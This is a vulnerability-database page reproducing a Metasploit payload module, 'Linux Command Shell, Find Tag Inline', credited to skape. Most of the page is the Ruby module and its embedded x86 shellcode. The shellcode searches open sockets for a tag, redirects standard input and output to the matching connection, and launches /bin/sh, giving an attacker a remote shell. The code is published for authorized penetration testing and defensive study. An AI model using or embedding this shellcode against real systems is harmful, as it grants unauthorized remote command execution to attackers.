Lucene search

Linux Command Shell, Find Tag Inline

🗓️ 19 Jul 2005 14:25:33Reported by skape <[email protected]>Type

Linux Command Shell, Find Tag Inline - Spawn a shell on an established connectio

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


module MetasploitModule

  CachedSize = 69

  include Msf::Payload::Single
  include Msf::Payload::Linux::X86::Prepends
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Linux Command Shell, Find Tag Inline',
      'Description'   => 'Spawn a shell on an established connection (proxy/nat safe)',
      'Author'        => 'skape',
      'License'       => MSF_LICENSE,
      'Platform'      => 'linux',
      'Arch'          => ARCH_X86,
      'Handler'       => Msf::Handler::FindTag,
      'Session'       => Msf::Sessions::CommandShellUnix,
      'Payload'       =>
        {
          'Offsets' =>
            {
              'TAG' => [ 0x1a, 'RAW' ],
            },
          'Payload' =>
            "\x31\xdb\x53\x89\xe6\x6a\x40\xb7\x0a\x53\x56\x53\x89\xe1\x86\xfb" +
            "\x66\xff\x01\x6a\x66\x58\xcd\x80\x81\x3e\x6d\x73\x66\x21\x75\xf0" +
            "\x5f\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b" +
            "\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52" +
            "\x53\x89\xe1\xcd\x80"
        }
      ))
  end

  #
  # Ensures the setting of TAG to a four byte value
  #
  def generate(_opts = {})
    datastore['TAG'] = _find_tag

    super
  end
end

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

19 Jul 2005 14:33Current

7.4High risk

Vulners AI Score7.4